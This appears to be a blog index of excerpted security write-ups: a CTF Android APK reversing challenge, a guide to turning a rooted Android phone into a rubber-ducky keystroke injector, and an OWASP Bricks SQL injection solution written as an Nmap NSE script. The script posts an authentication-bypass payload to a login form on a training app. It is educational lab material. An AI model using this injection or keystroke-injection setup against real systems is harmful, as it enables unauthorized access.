Challenge Description Welp, time to do it again. Unable to install? That is a part of the challenge, try to overcome it. Author: Trailbl4z3r & Monaruku hint: Tbh this is not a natively built app, more like something just wrapped into an app World-II.apk Solution Since it’s an APK file, Lets start with jadx-gui for static analysis. In terms of static analysis, it’s always best to check out AndroidManifest.xml first. ...
Prerequisite a physical android devices rooted termux app As mentioned, the android devices must be rooted in order to work like a rubber ducky. I’ll be using my old devices that I have rooted as demonstration purposes. Here’s a quick evidence that my devices is rooted. Setting up Now that the android devices is rooted, I’ll need to download some useful files and application that has been created by others ...
Challenge Information OWASP Bricks Docker version: here This is a series where I will write my own Nmap NSE script to solve that challenge. This is actually a task given by masta ghimau during MCC 2023. Challenge Solution Login level 5 is just a simple SQL injection which will convert password into md5 hash. We could easily overcome it by injecting in username field. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 local http = require "http" local shortport = require "shortport" portrule = shortport.http action = function(host,port) local resp,final,query r={} r['username']="a' OR 1=1-- a" r['passwd']="test" r['submit']="Submit" resp = http.post(host,port,"/login-5/index.php",nil,nil,r) final = string.match(resp.body, '<p>.*alert%-box.->(.-)<a.*</p>') query = string.match(resp.body, ".*SQL Query(.*)<a.*</div>") return {payload = r ,SQLQuery = query , result = final} end This code is built based on http-title.nse. ...